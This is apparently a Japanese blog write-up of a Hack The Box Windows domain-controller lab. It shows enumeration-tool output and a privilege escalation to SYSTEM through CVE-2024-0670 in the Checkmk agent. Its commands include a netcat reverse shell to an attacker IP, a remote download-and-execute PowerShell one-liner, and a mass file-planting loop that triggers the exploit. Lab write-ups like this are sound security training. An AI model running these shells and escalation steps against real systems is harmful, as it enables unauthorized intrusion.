              ((((((((((((((((((((((((((((((((((((((
                 ((((((((((((((((((((((((((((((

ADVISORY: winpeas should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own devices and/or with the device owner's permission.

  WinPEAS-ng by @hacktricks_live

       /---------------------------------------------------------------------------------\
       |                             Do you like PEASS?                                  |
       |---------------------------------------------------------------------------------| 
       |         Learn Cloud Hacking       :     training.hacktricks.xyz                 |
       |         Follow on Twitter         :     @hacktricks_live                        |
       |         Respect on HTB            :     SirBroccoli                             |
       |---------------------------------------------------------------------------------|
       |                                 Thank you!                                      |
       \---------------------------------------------------------------------------------/

  [+] Legend:
         Red                Indicates a special privilege over an object or something is misconfigured
         Green              Indicates that some protection is enabled or something is well configured

何もいいのなかったわ。と、ここでweb_svcのUserフォルダがあるのに気が付く。
Sliver経由のRunasCSでこのユーザ権限のShellも取っておくか。
まずはモニターさんのビーコン貰います。
スクリーンショット 2025-11-16 011033.png
レッツRunas!
スクリーンショット 2025-11-16 011625.png
あ、このLogonTypeだめなのね、なら直でプロセスから貰います。
スクリーンショット 2025-11-16 012124.png
シェルもらえたので階層見てみます!

C:\Users\web_svc>tree /F /a
tree /F /a
Folder PATH listing
Volume serial number is 2EB6-7759
C:.
+---3D Objects
+---Contacts
+---Desktop
+---Documents
+---Downloads
+---Favorites
|   |   Bing.url
|   |   
|   \---Links
+---Links
|       Desktop.lnk
|       Downloads.lnk
|       script_02.ps1
|       
+---Music
+---Pictures
+---Saved Games
+---Searches
\---Videos

C:\Users\web_svc>

いいのないなぁ、スクリプトはNTLMハッシュもらうためのCVE-2025-24071発火スクリプトだしな。
Powerlessも回そうか。

PS C:\Windows\Temp> .\Powerless.bat
.\Powerless.bat
------ System Info (Use full output in conjunction with windows-exploit-suggester.py)-------

Host Name:                 DC01
OS Name:                   Microsoft Windows Server 2022 Standard
OS Version:                10.0.20348 N/A Build 20348
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Primary Domain Controller
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00454-20165-01481-AA791
Original Install Date:     4/2/2025, 6:21:44 PM
System Boot Time:          11/15/2025, 1:16:41 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware20,1
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz
BIOS Version:              VMware, Inc. VMW201.00V.24504846.B64.2501180339, 1/18/2025
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume2
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory:     4,095 MB
Available Physical Memory: 469 MB
Virtual Memory: Max Size:  5,503 MB
Virtual Memory: Available: 1,337 MB
Virtual Memory: In Use:    4,166 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    nanocorp.htb
Logon Server:              \\DC01
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB5008882
                           [02]: KB5051979
                           [03]: KB5050117
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet0 2
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.11.93
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

----- Architecture -------
PROCESSOR_ARCHITECTURE=AMD64
PROCESSOR_IDENTIFIER=AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
PROCESSOR_LEVEL=25
PROCESSOR_REVISION=0101

------ Users and groups (check individual user with 'net user USERNAME' ) Check user privileges for SeImpersonate (rotten potato exploit) -------
Current User: web_svc 

USER INFORMATION
----------------

User Name        SID                                          
================ =============================================
nanocorp\web_svc S-1-5-21-2261381271-1331810270-697239744-1103


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                           Attributes                                        
========================================== ================ ============================================= ==================================================
Everyone                                   Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE                   Well-known group S-1-5-4                                       Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
NANOCORP\IT_Support                        Group            S-1-5-21-2261381271-1331810270-697239744-3102 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192                                                                                     


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State   
============================= ============================== ========
SeMachineAccountPrivilege     Add workstations to domain     Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
--- All users, accounts and groups ---

User accounts for \\DC01

-------------------------------------------------------------------------------
Administrator            Guest                    krbtgt                   
monitoring_svc           web_svc                  
The command completed successfully.

Force user logoff how long after time expires?:       Never
Minimum password age (days):                          1
Maximum password age (days):                          42
Minimum password length:                              7
Length of password history maintained:                24
Lockout threshold:                                    Never
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Computer role:                                        PRIMARY
The command completed successfully.


Aliases for \\DC01

-------------------------------------------------------------------------------
*Access Control Assistance Operators
*Account Operators
*Administrators
*Allowed RODC Password Replication Group
*Backup Operators
*Cert Publishers
*Certificate Service DCOM Access
*Cryptographic Operators
*Denied RODC Password Replication Group
*Distributed COM Users
*DnsAdmins
*Event Log Readers
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Incoming Forest Trust Builders
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Pre-Windows 2000 Compatible Access
*Print Operators
*RAS and IAS Servers
*RDS Endpoint Servers
*RDS Management Servers
*RDS Remote Access Servers
*Remote Desktop Users
*Remote Management Users
*Replicator
*Server Operators
*Storage Replica Administrators
*Terminal Server License Servers
*Users
*Windows Authorization Access Group
The command completed successfully.

------- Administrators --------
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
The command completed successfully.

------- Environment Variables -------
ALLUSERSPROFILE=C:\ProgramData
APPDATA=C:\Users\web_svc\AppData\Roaming
CommonProgramFiles=C:\Program Files\Common Files
CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
CommonProgramW6432=C:\Program Files\Common Files
COMPUTERNAME=DC01
ComSpec=C:\Windows\system32\cmd.exe
DriverData=C:\Windows\System32\Drivers\DriverData
HOMEDRIVE=C:
HOMEPATH=\Users\web_svc
LOCALAPPDATA=C:\Users\web_svc\AppData\Local
LOGONSERVER=\\DC01
NUMBER_OF_PROCESSORS=2
OS=Windows_NT
Path=C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\web_svc\AppData\Local\Microsoft\WindowsApps
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
PROCESSOR_ARCHITECTURE=AMD64
PROCESSOR_IDENTIFIER=AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
PROCESSOR_LEVEL=25
PROCESSOR_REVISION=0101
ProgramData=C:\ProgramData
ProgramFiles=C:\Program Files
ProgramFiles(x86)=C:\Program Files (x86)
ProgramW6432=C:\Program Files
PROMPT=$P$G
PSExecutionPolicyPreference=Bypass
PSModulePath=C:\Users\web_svc\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
PUBLIC=C:\Users\Public
SystemDrive=C:
SystemRoot=C:\Windows
TEMP=C:\Users\web_svc\AppData\Local\Temp
TMP=C:\Users\web_svc\AppData\Local\Temp
USERDNSDOMAIN=nanocorp.htb
USERDOMAIN=NANOCORP
USERDOMAIN_ROAMINGPROFILE=NANOCORP
USERNAME=web_svc
USERPROFILE=C:\Windows\Temp

PrivCheckも回してみるか。

PS C:\Windows\Temp> IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.6/PrivescCheck.ps1'); Invoke-PrivescCheck
IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.6/PrivescCheck.ps1'); Invoke-PrivescCheck
????????????????????????????????????????????????????????????????
? CATEGORY ? TA0043 - Reconnaissance                           ?
? NAME     ? User - Identity                                   ?
? TYPE     ? Base                                              ?
????????????????????????????????????????????????????????????????
? Get information about the current user (name, domain name)   ?
? and its access token (SID, integrity level, authentication   ?
? ID).                                                         ?
????????????????????????????????????????????????????????????????


Name             : NANOCORP\web_svc
SID              : S-1-5-21-2261381271-1331810270-697239744-1103
IntegrityLevel   : Medium Mandatory Level (S-1-16-8192)
SessionId        : 0
TokenId          : 00000000-0294b96e
AuthenticationId : 00000000-026b04f7
OriginId         : 00000000-023c4b35
ModifiedId       : 00000000-026b051b
Source           : seclogo (00000000-00000000)



[*] Status: Informational - Severity: None - Execution time: 00:00:00.405


????????????????????????????????????????????????????????????????
? CATEGORY ? TA0043 - Reconnaissance                           ?
? NAME     ? User - Groups                                     ?
? TYPE     ? Base                                              ?
????????????????????????????????????????????????????????????????
? Get information about the groups the current user belongs to ?
? (name, type, SID).                                           ?
????????????????????????????????????????????????????????????????

Name                                       Type           SID                                          
----                                       ----           ---                                          
NANOCORP\Domain Users                      Group          S-1-5-21-2261381271-1331810270-697239744-513 
Everyone                                   WellKnownGroup S-1-1-0                                      
BUILTIN\Users                              Alias          S-1-5-32-545                                 
BUILTIN\Pre-Windows 2000 Compatible Access Alias          S-1-5-32-554                                 
NT AUTHORITY\INTERACTIVE                   WellKnownGroup S-1-5-4                                      
CONSOLE LOGON                              WellKnownGroup S-1-2-1                                      
NT AUTHORITY\Authenticated Users           WellKnownGroup S-1-5-11                                     
NT AUTHORITY\This Organization             WellKnownGroup S-1-5-15                                     
NT AUTHORITY\LogonSessionId_0_40568054     LogonSession   S-1-5-5-0-40568054                           
NANOCORP\IT_Support                        Group          S-1-5-21-2261381271-1331810270-697239744-3102
NT AUTHORITY\NTLM Authentication           WellKnownGroup S-1-5-64-10                                  
Mandatory Label\Medium Mandatory Level     Label          S-1-16-8192                                  


[*] Status: Informational - Severity: None - Execution time: 00:00:00.104


????????????????????????????????????????????????????????????????
? CATEGORY ? TA0004 - Privilege Escalation                     ?
? NAME     ? User - Privileges                                 ?
? TYPE     ? Base                                              ?
????????????????????????????????????????????????????????????????
? Check whether the current user is granted privileges that    ?
? can be leveraged for local privilege escalation.             ?
????????????????????????????????????????????????????????????????

Name                          State    Description                    Exploitable
----                          -----    -----------                    -----------
SeMachineAccountPrivilege     Disabled Add workstations to domain           False
SeChangeNotifyPrivilege       Enabled  Bypass traverse checking             False
SeIncreaseWorkingSetPrivilege Disabled Increase a process working set       False


[*] Status: Informational (not vulnerable) - Severity: None - Execution time: 00:00:00.323


????????????????????????????????????????????????????????????????
? CATEGORY ? TA0004 - Privilege Escalation                     ?
? NAME     ? User - Privileges (GPO)                           ?
? TYPE     ? Base                                              ?
????????????????????????????????????????????????????????????????
? Check whether the current user is granted privileges,        ?
? through a group policy, that can be leveraged for local      ?
? privilege escalation.                                        ?
????????????????????????????????????????????????????????????????
[*] Status: Informational (not vulnerable) - Severity: None - Execution time: 00:00:00.158


????????????????????????????????????????????????????????????????
? CATEGORY ? TA0006 - Credential Access                        ?
? NAME     ? User - Environment Variables                      ?
? TYPE     ? Base                                              ?
????????????????????????????????????????????????????????????????
? Check whether any environment variables contain sensitive    ?
? information such as credentials or secrets. Note that this   ?
? check follows a keyword-based approach and thus might not be ?
? completely reliable.                                         ?
????????????????????????????????????????????????????????????????
[*] Status: Informational (nothing found) - Severity: None - Execution time: 00:00:00.047


????????????????????????????????????????????????????????????????
? CATEGORY ? TA0004 - Privilege Escalation                     ?
? NAME     ? Services - Non-Default Services                   ?
? TYPE     ? Base                                              ?
????????????????????????????????????????????????????????????????
? Get information about third-party services. It does so by    ?
? parsing the target executable's metadata and checking        ?
? whether the publisher is Microsoft.                          ?
????????????????????????????????????????????????????????????????


Name        : CheckmkService
DisplayName : Checkmk Service
ImagePath   : "C:\Program Files (x86)\checkmk\service\check_mk_agent.exe"
User        : LocalSystem
StartMode   : Automatic

Name        : ssh-agent
DisplayName : OpenSSH Authentication Agent
ImagePath   : C:\Windows\System32\OpenSSH\ssh-agent.exe
User        : LocalSystem
StartMode   : Disabled

Name        : VGAuthService
DisplayName : VMware Alias Manager and Ticket Service
ImagePath   : "C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"
User        : LocalSystem
StartMode   : Automatic

Name        : vm3dservice
DisplayName : @oem8.inf,%VM3DSERVICE_DISPLAYNAME%;VMware SVGA Helper Service
ImagePath   : C:\Windows\system32\vm3dservice.exe
User        : LocalSystem
StartMode   : Automatic

Name        : VMTools
DisplayName : VMware Tools
ImagePath   : "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
User        : LocalSystem
StartMode   : Automatic



[*] Status: Informational - Severity: None - Execution time: 00:00:04.727


????????????????????????????????????????????????????????????????
? CATEGORY ? TA0004 - Privilege Escalation                     ?
? NAME     ? Services - Known Vulnerable Kernel Drivers        ?
? TYPE     ? Base                                              ?
????????????????????????????????????????????????????????????????
? Check whether known vulnerable kernel drivers are installed. ?
? It does so by computing the file hash of each driver and     ?
? comparing the value against the list provided by             ?
? loldrivers.io.                                               ?
????????????????????????????????????????????????????????????????
WARNING: Service: vwifibus | Path not found: C:\Windows\System32\drivers\vwifibus.sys
[*] Status: Informational (not vulnerable) - Severity: None - Execution time: 00:00:07.549

お、なんかCheckmkServiceみたいなサービスが見える。
winPeasにもそれっぽいプロセスがあったのでそれかな?
スクリーンショット 2025-11-16 024122.png
このサービスについて調べてみる。

CVE-2024-0670

以下の特権昇格の脆弱性が見つかった。

これを試してみる。
Tempをいじっていかないといけないのだが、web_svcのUSERPROFILEC:\Windows\Tempなので、色々と権限がありそう。こっちで試す。

まずはmsiファイルを探索する。
適当にAIにPSコマンド提案してもらった。

PS C:\Windows\system32> Get-ChildItem -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products | Where-Object { $_.GetSubKeyNames() -contains 'InstallProperties' } | ForEach-Object { Get-ItemProperty -Path "$($_.PSPath)\InstallProperties" -ErrorAction SilentlyContinue } | Where-Object { $_.DisplayName -match 'mk' -and $_.LocalPackage -like 'C:\Windows\Installer\*' } | Select-Object DisplayName, LocalPackage | Format-Table -AutoSize
Get-ChildItem -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products | Where-Object { $_.GetSubKeyNames() -contains 'InstallProperties' } | ForEach-Object { Get-ItemProperty -Path "$($_.PSPath)\InstallProperties" -ErrorAction SilentlyContinue } | Where-Object { $_.DisplayName -match 'mk' -and $_.LocalPackage -like 'C:\Windows\Installer\*' } | Select-Object DisplayName, LocalPackage | Format-Table -AutoSize

DisplayName        LocalPackage                  
-----------        ------------                  
Check MK Agent 2.1 C:\Windows\Installer\1e6f2.msi

いた。1e6f2.msiだ。次に実行ファイルなのだが、、、
Processを総当たりするため、ファイルが1万個くらい必要になる。ドでかい悪性ファイルを何個も用意はHTBマシンスペック上厳しいのでBATファイルでコマンドテキストファイルを用意する。

mal.cmd
cmd /c "C:\Windows\Temp\nc.exe 10.10.14.6 8444 cmd"

こんな感じだ。後はこれをProcess名総当たりのためのcmd_all_[PID].cmdとして保存する。

PS C:\Windows\Temp> iwr -uri http://10.10.14.6/mal.cmd -o mal.cmd
PS C:\Windows\Temp> 1000..15000 | foreach { copy C:\Windows\Temp\mal.cmd C:\Windows\Temp\cmk_all_$($_)_1.cmd; Set-ItemProperty -path C:\Windows\Temp\cmk_all_$($_)_1.cmd -name IsReadOnly -value $true }

死ぬほどファイルが出来るので、他のHTBの攻略中Userがいる場合はファイル上書き合戦となり、非常に厳しい戦いとなるだろうw
後はmsiexecを通すだけ。

msiexec /fa C:\Windows\Installer\1e6f2.msi

スクリーンショット 2025-11-16 033833.png
これでSYSTEM昇格ができました。

まとめ

image.png
ファイル上書き合戦疲れた。これは二度とやりたくない。
Userまではよかった気がするw

今回もセキュリティエンジニアの皆さんの助けになればなと思います。

0
0
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?